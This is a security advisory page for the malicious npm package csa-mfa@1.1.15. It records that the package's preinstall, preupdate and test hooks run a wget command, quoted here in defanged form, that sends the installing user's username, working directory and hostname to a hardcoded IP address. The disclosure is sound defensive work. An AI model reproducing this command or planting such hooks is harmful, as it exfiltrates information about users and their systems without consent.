LWA-2026-12149 MAL-2026-16175 ↗ confirmed malware

csa-mfa@1.1.15

Malicious code in csa-mfa (npm)

T1059 · Command and Scripting InterpreterT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 Channel

Analysis

The package ships no code — only a package.json whose preinstall, preupdate, and test lifecycle hooks each run `wget --quiet "hxxp://169[.]58[.]142[.]14:8080/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"`. On install, the hook exfiltrates the installing user's username, current working directory, and hostname to the hardcoded host 169[.]58[.]142[.]14:8080.

analyzed by
Leitwacht
first seen
Sep 15, 2026, 10:28 AM
analyzed
Sep 15, 2026, 10:30 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.